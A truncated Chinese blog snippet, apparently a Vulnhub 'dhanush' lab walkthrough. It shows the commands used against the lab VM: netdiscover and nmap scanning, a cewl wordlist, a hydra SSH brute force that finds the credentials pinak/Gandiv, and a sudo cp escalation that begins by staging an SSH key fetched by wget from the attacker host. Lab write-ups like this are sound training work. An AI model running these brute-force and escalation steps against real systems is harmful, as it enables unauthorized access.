今天看啥  ›  专栏  ›  云计算和网络安全技术实践

vulnhub之dhanush的实践

云计算和网络安全技术实践  · 公众号  ·  · 2024-01-08 08:40
本周实践的是vulnhub的dhanush镜像,下载地址,https://download.vulnhub.com/ha/dhanush.zip,用workstation导入成功,做地址扫描,sudo netdiscover -r 192.168.220.0/24,获取到靶机地址192.168.220.154,继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.220.154,获取到靶机有80端口的http服务和65345端口的ssh服务,浏览器访问http://192.168.220.154,爬取页面上的字符串做字典,cewl http://192.168.220.154 -w dict.txt,把字典同时当用户名密码,用hydra做ssh暴破,hydra -L dict.txt -P dict.txt 192.168.220.154 ssh -s 65345,获取到用户名密码pinak/Gandiv,从kali攻击机上登录,ssh pinak@192.168.220.154 -p 65345,sudo -l发现有sarang账户权限能执行的cp程序,在kali攻击机上制作ssh密钥,ssh-keygen,cd .ssh,开启http下载服务,python2 -m SimpleHTTPServer,在靶机上下载ssh公钥,cd /tmp,wget http://192.168.220.153:8000/id_rsa.pub,修改权限,chmod 777 id_ ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照